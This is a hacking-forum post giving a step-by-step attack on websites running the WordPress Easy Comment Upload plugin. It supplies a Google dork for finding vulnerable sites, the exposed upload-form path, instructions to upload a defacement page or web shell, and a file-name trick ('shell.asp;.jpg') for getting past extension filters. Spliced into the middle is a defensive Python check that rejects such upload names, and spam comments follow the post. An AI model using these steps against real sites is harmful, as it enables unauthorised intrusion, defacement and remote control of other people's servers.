WordPress Easy Comment Upload (Plugin) Exploit (10,000 Websites are Vulnerable for this Attack) - Exploits and Vulnerabilities - Web Hacking - Hacking - GeniusHackers.Net

WordPress Easy Comment Upload (Plugin) Exploit (10,000 Websites are Vulnerable for this Attack)
Title: WordPress Easy Comment Upload (Plugin) Exploit 
Author: R00T-HaXor

Let's start.
Open Google Search and enter the dork given below.
Google Dork
"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php" 
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads

Select a website from the search results. The exploit URL will look like this:
Exploit
site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You will get an upload option there. Now upload your deface, then check it at site.com/wp-content/uploads/2011/05/yourfilehere


Note
On some websites you can upload your deface as txt only, and you can upload a shell on only 50% of sites. Upload the shell in image format, i.e.,
shell.asp;.jpg
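A defender-side check for the file-name trick in the note above, as an added example that is not part of the original article or the plugin's code: it rejects upload names such as shell.asp;.jpg, where an image extension comes last but a script extension appears earlier. The allow-list, the executable-extension list and the function names are assumptions chosen for illustration.

```python
import re

# Assumed policy for illustration (not taken from the plugin).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "txt"}
# Extensions a web server may execute; none may appear anywhere in the name.
EXECUTABLE_EXTENSIONS = {
    "php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx", "asa",
    "cer", "jsp", "cgi", "pl", "py", "sh", "htaccess",
}
# Exactly one dot: a plain base name followed by a single extension.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]*\.[A-Za-z0-9]+")


def check_upload_name(name):
    """Return the reasons to reject `name`; an empty list means accept."""
    reasons = []
    if "/" in name or "\\" in name or "\x00" in name:
        reasons.append("path separator or NUL byte")
    if ";" in name:
        reasons.append("semicolon in name")
    # Treat every token after the first '.' or ';' as an extension, so the
    # 'asp' in 'shell.asp;.jpg' is seen even though '.jpg' comes last.
    tokens = [t.lower() for t in re.split(r"[.;]", name)[1:] if t]
    if any(t in EXECUTABLE_EXTENSIONS for t in tokens):
        reasons.append("executable extension present")
    if not tokens or tokens[-1] not in ALLOWED_EXTENSIONS:
        reasons.append("final extension not allowed")
    if not SAFE_NAME.fullmatch(name):
        reasons.append("not in basename.ext form")
    return reasons


def audit(names):
    """Map each rejected file name to its rejection reasons."""
    return {n: r for n in names if (r := check_upload_name(n))}


# Constructed sample names, e.g. from a listing of wp-content/uploads/2011/05/.
SAMPLE = ["holiday.jpg", "notes.txt", "shell.asp;.jpg", "image.php.png", "deface.html"]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE).items():
        print(f"REJECT {name}: {', '.join(reasons)}")
```

Run over a listing of the uploads directory, it flags files that were already accepted; at upload time, storing each file under a server-generated name is a stronger control than filtering alone.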


Category: Exploits and Vulnerabilities | Added by: MaX-HaCker (12.08.17)
Views: 1487 | Comments: 11 | Rating: 5.0/1
Total comments: 4
4 buffkessy   (12.11.05 7:28 AM)
I want to order advertising from you, where should I write?

3 Stacy Williams   (12.09.25 12:45 PM)
This article provides many tips. Very useful to me. Thanks a lot.

2 Edna N Ramirez   (12.09.18 3:45 PM)
The new Zune browser is surprisingly good, but not as good as the iPod's. It works well, but isn't as fast as Safari, and has a clunkier interface. If you occasionally plan on using the web browser that's not an issue, but if you're planning to browse the web a lot from your PMP then the iPod's larger screen and better browser may be important.

1 Dragana Vuckovic   (12.08.21 4:50 PM)